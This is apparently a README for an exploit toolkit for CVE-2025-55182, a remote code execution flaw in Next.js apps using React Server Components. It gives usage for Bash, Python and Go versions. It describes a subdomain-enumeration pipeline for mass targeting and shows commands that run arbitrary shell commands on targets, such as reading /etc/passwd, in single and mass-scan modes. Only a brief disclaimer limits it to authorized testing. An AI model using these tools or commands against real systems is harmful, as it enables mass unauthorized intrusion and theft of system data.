Share
## https://sploitus.com/exploit?id=485C7034-FDB6-547A-9F13-03C026F10F76
# CVE-2025-55182: React Server Components RCE Scanner
A comprehensive toolkit for detecting and exploiting **CVE-2025-55182**, a Critical Remote Code Execution vulnerability in Next.js applications using React Server Components.
This repository features a unified Bash scanner (Single & Mass mode), Python/Go implementations, and a bug bounty reconnaissance workflow.


---
## ๐ Repository Structure
* **scanner.sh** โ All-in-one Bash script for Single Target and Mass Scanning
* **python/exploit.py** โ Stable Python implementation (better JSON escaping)
* **go/main.go** โ High-performance implementation (compilable)
---
## ๐ Reconnaissance Workflow (Bug Bounty Methodology)
For mass hunting on wildcard domains, use this pipeline to filter targets before scanning:
```bash
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt
# 2. Filter for live hosts
httpx -l subs.txt -o live.txt
# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
```
---
## ๐ ๏ธ Bash Scanner Usage (Recommended)
The `scanner.sh` script supports **single target scans** and **mass scanning** from a file list.
### ๐ง Installation
```bash
chmod +x scanner.sh
```
---
## 1๏ธโฃ Single Target Mode
Best for verifying a specific target with verbose output.
```bash
# Basic check (defaults to "id")
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"
```
---
## 2๏ธโฃ Mass Scan Mode
Efficiently scans a list of URLs and saves vulnerable hosts to a file.
```bash
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"
# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt
```
### Options
| Flag | Description |
| ----- | ---------------------------------------------------------------------- |
| `-d, --domain` | Single target URL |
| `-l, --list` | File containing list of URLs |
| `-c, --command` | Command to execute (default: `id`) |
| `-o, --output` | Output file for vulnerable hosts (default: `vulnerable_hosts.txt`) |
---
## ๐ Python Version
Use this if you encounter issues with Bash escaping special characters.
### Requirements
```bash
pip install requests
```
### Usage
```bash
python3 python/exploit.py -u http://target.com -c "uname -a"
```
---
## ๐น Go Version
High performance, minimal dependencies.
### Run directly
```bash
go run go/main.go -u http://target.com -c "id"
```
### Build binary
```bash
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
```
---
## โ ๏ธ Disclaimer
This tool is for **educational purposes and authorized security testing only**.
Unauthorized usage is strictly illegal.
The developer assumes **no liability** for misuse or damages caused by this program.
---
## ๐ References
* **NVD CVE Detail:**
[https://nvd.nist.gov/vuln/detail/CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
* **React Security Advisory (React Server Components vulnerability):**
[https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
* **ProjectDiscovery Nuclei Template:**
[https://cloud.projectdiscovery.io/library/CVE-2025-55182](https://cloud.projectdiscovery.io/library/CVE-2025-55182)